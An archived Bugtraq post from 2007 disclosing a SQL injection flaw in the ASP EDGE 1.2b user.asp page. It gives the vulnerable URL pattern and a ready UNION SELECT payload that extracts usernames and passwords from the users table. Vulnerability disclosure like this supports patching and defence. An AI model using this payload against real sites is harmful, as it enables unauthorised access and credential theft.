Bugtraq mailing list archives
ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
From: ajannhwt () hotmail com
Date: 25 Jan 2007 17:02:33 -0000
******************************************************************************* # Title : ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4 # $$ : Free ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//user.asp?user=[SQL] Example: //user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!
Current thread:
- ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability ajannhwt (Jan 25)